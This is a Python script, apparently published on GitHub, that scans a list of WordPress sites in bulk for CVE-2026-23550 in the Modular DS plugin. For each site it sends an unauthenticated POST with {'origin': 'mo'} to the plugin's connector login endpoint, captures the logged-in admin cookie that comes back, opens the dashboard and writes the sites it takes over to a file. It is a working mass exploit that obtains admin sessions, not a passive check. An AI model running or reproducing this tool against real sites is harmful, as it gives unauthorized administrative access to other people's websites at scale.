#!/usr/bin/env python3
"""
██████╗ ███████╗ ███╗ ███╗██╗███╗ ██╗██████╗ ██╗███╗ ██╗ ██╗███████╗ ██████╗████████╗ ██████╗ ██████╗
██╔══██╗╚══███╔╝ ████╗ ████║██║████╗ ██║██╔══██╗ ██║████╗ ██║ ██║██╔════╝██╔════╝╚══██╔══╝██╔═══██╗██╔══██╗
██║ ██║ ███╔╝ ██╔████╔██║██║██╔██╗ ██║██║ ██║ ██║██╔██╗ ██║ ██║█████╗ ██║ ██║ ██║ ██║██████╔╝
██║ ██║ ███╔╝ ██║╚██╔╝██║██║██║╚██╗██║██║ ██║ ██║██║╚██╗██║██ ██║██╔══╝ ██║ ██║ ██║ ██║██╔══██╗
██████╔╝███████╗ ██║ ╚═╝ ██║██║██║ ╚████║██████╔╝ ██║██║ ╚████║╚█████╔╝███████╗╚██████╗ ██║ ╚██████╔╝██║ ██║
╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚═════╝ ╚═╝╚═╝ ╚═══╝ ╚════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝
https://github.com/dzmind2312
CVE-2026-23550 Modular DS Admin Bypass Scanner (Multi-threaded)
"""
import requests
import threading
import time
import sys
import argparse
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, SpinnerColumn, TextColumn, BarColumn
from rich.table import Table
from rich import print
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
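class ModularDSScanner:
    """Multi-threaded checker for CVE-2026-23550 (Modular DS admin bypass).

    Reads a list of sites, sends one request per site to the plugin's
    connector login endpoint and reports whether a ``wordpress_logged_in_``
    cookie comes back.

    This is an active check, not a version fingerprint: a positive result
    means the site answered an unauthenticated request with a logged-in
    session cookie, so the probe itself obtains a session on the target.

    Attributes:
        console: Rich console used for all output.
        targets_file: Path of the text file listing one site per line.
        threads: Worker count passed to the thread pool.
        output: Path of the file that receives the confirmed hosts.
        vulnerable: Normalised URLs of sites where dashboard access was seen.
        results: One dict per finding or failed probe, with the keys
            ``target``, ``status`` and ``cookies``.
    """

    def __init__(self, targets_file, threads=20, output="vulns.txt"):
        """Store the scan settings and create empty result lists."""
        self.console = Console()
        self.targets_file = targets_file
        self.threads = threads
        self.output = output
        self.vulnerable = []
        self.results = []

    def test_target(self, target):
        """Check one site for CVE-2026-23550.

        Args:
            target: Site URL or bare host; ``https://`` is prepended when no
                scheme is given.

        Returns:
            A Rich-markup status line for the console. Findings and failed
            probes are also appended to ``self.results``; confirmed sites are
            appended to ``self.vulnerable``.
        """
        try:
            # Bare hosts are assumed to speak HTTPS.
            if not target.startswith(('http://', 'https://')):
                target = 'https://' + target.lstrip('/')
            base = target.rstrip('/')

            # The context manager releases the connection pool for every
            # target; the original left each Session open.
            with requests.Session() as session:
                # NOTE(review): certificate validation is disabled, so the
                # answer is not authenticated; an on-path party could forge
                # either outcome.
                session.verify = False

                endpoint = f"{base}/wp-content/plugins/modular-ds/api/modular-connector/login"
                session.post(
                    endpoint,
                    json={"origin": "mo"},
                    headers={"Content-Type": "application/json"},
                    timeout=10
                )

                # A logged-in cookie in the jar is the primary indicator.
                admin_cookie = any(
                    'wordpress_logged_in_' in cookie.name
                    for cookie in session.cookies
                )
                if not admin_cookie:
                    return f"[dim]❌ Not Vulnerable: {target}[/dim]"

                admin_resp = session.get(f"{base}/wp-admin/", timeout=5)
                # NOTE(review): this keyword match is loose; 'wp-admin' and
                # 'welcome' can presumably appear on pages other than the
                # dashboard, so a hit should be confirmed manually.
                page = admin_resp.text.lower()
                has_admin = any(
                    word in page
                    for word in ['dashboard', 'wp-admin', 'welcome']
                )
                cookie_count = len(session.cookies)

            if has_admin:
                self.vulnerable.append(target)
                self.results.append({
                    'target': target,
                    'status': '🔥 FULL ADMIN ACCESS',
                    'cookies': cookie_count
                })
                return f"[green]✅ VULNERABLE: {target}[/green]"

            self.results.append({
                'target': target,
                'status': '⚠️ Admin Cookie (No Dashboard)',
                'cookies': cookie_count
            })
            return f"[yellow]⚠️ Admin Cookie: {target}[/yellow]"
        except Exception as e:
            # Per-target boundary inside a worker thread: keep the scan going,
            # but record the failure so the summary does not read as a clean
            # result for a site that was never actually checked.
            self.results.append({
                'target': target,
                'status': '✗ Error',
                'cookies': 0
            })
            return f"[red]✗ Error: {target} ({str(e)[:50]})[/red]"

    def scan(self):
        """Probe every listed target and print a summary.

        Reads ``self.targets_file`` (blank lines and ``#`` comments are
        skipped), runs ``test_target`` on a thread pool, prints a results
        table and writes the confirmed hosts to ``self.output``.
        """
        with open(self.targets_file, 'r') as f:
            # Strip first so an indented '# comment' line is not treated as a
            # target.
            targets = [
                entry
                for entry in (line.strip() for line in f)
                if entry and not entry.startswith('#')
            ]

        self.console.print(f"""
[bold cyan]🔥 CVE-2026-23550 Modular DS Scanner 🔥
██████╗ ███████╗ ███╗ ███╗██╗███╗ ██╗██████╗ ██╗███╗ ██╗ ██╗███████╗ ██████╗████████╗ ██████╗ ██████╗
██╔══██╗╚══███╔╝ ████╗ ████║██║████╗ ██║██╔══██╗ ██║████╗ ██║ ██║██╔════╝██╔════╝╚══██╔══╝██╔═══██╗██╔══██╗
██║ ██║ ███╔╝ ██╔████╔██║██║██╔██╗ ██║██║ ██║ ██║██╔██╗ ██║ ██║█████╗ ██║ ██║ ██║ ██║██████╔╝
██║ ██║ ███╔╝ ██║╚██╔╝██║██║██║╚██╗██║██║ ██║ ██║██║╚██╗██║██ ██║██╔══╝ ██║ ██║ ██║ ██║██╔══██╗
██████╔╝███████╗ ██║ ╚═╝ ██║██║██║ ╚████║██████╔╝ ██║██║ ╚████║╚█████╔╝███████╗╚██████╗ ██║ ╚██████╔╝██║ ██║
╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚═════╝ ╚═╝╚═╝ ╚═══╝ ╚════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝
https://github.com/dzmind2312
CVE-2026-23550 Modular DS Admin Bypass Scanner (Multi-threaded)
[/bold cyan]
[bright_black]Targets: {len(targets)} | Threads: {self.threads} | Output: {self.output}[/bright_black]
""")

        # Rich progress bar
        with Progress(
            SpinnerColumn(),
            TextColumn("[progress.description]{task.description}"),
            BarColumn(),
            console=self.console
        ) as progress:
            task = progress.add_task("Scanning Modular DS...", total=len(targets))
            with ThreadPoolExecutor(max_workers=self.threads) as executor:
                futures = [executor.submit(self.test_target, target) for target in targets]
                for future in as_completed(futures):
                    # test_target catches its own exceptions, so result()
                    # yields a status line for every target.
                    self.console.print(future.result())
                    progress.advance(task)

        # Summary table
        self.console.print("\n" + "="*80)
        table = Table(title="Scan Results")
        table.add_column("Status", style="cyan")
        table.add_column("Target", style="magenta")
        table.add_column("Details", style="green")
        for result in self.results:
            table.add_row(
                result['status'],
                result['target'],
                f"{result['cookies']} cookies"
            )
        self.console.print(table)

        # Every confirmed host has exactly one entry in results, so the
        # remainder is failed probes plus cookie-only findings.
        needs_review = len(self.results) - len(self.vulnerable)

        if self.vulnerable:
            # The output file lists confirmed hosts in plain text.
            with open(self.output, 'w') as f:
                f.writelines(f"{vuln}\n" for vuln in self.vulnerable)
            self.console.print(f"\n[bold green]💾 {len(self.vulnerable)} vulnerable targets → {self.output}[/bold green]")
        elif not needs_review:
            self.console.print("\n[bold green]✅ No vulnerabilities found![/bold green]")

        if needs_review:
            # Do not report a clean run when some targets errored out or
            # returned a session cookie without a confirmed dashboard.
            self.console.print(
                f"\n[bold yellow]⚠️ {needs_review} target(s) need manual review "
                "(request error or session cookie without dashboard)[/bold yellow]"
            )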
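def main():
    """Parse the command-line options and run one scan.

    Options: ``-l/--list`` (required targets file), ``-t/--threads`` (worker
    count, default 20) and ``-o/--output`` (results file, default vulns.txt).
    """
    parser = argparse.ArgumentParser(description="CVE-2026-23550 Modular DS Scanner")
    parser.add_argument("-l", "--list", required=True, help="Targets file (one URL per line)")
    parser.add_argument("-t", "--threads", type=int, default=20, help="Max threads (default: 20)")
    parser.add_argument("-o", "--output", default="vulns.txt", help="Output file (default: vulns.txt)")
    args = parser.parse_args()

    # ThreadPoolExecutor raises ValueError for max_workers < 1; turn that into
    # a normal usage error instead of a traceback in the middle of the scan.
    if args.threads < 1:
        parser.error("--threads must be at least 1")

    scanner = ModularDSScanner(args.list, args.threads, args.output)
    scanner.scan()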
# Run the command-line interface only when the file is executed as a script,
# so importing the module has no side effects beyond the definitions above.
if __name__ == "__main__":
    main()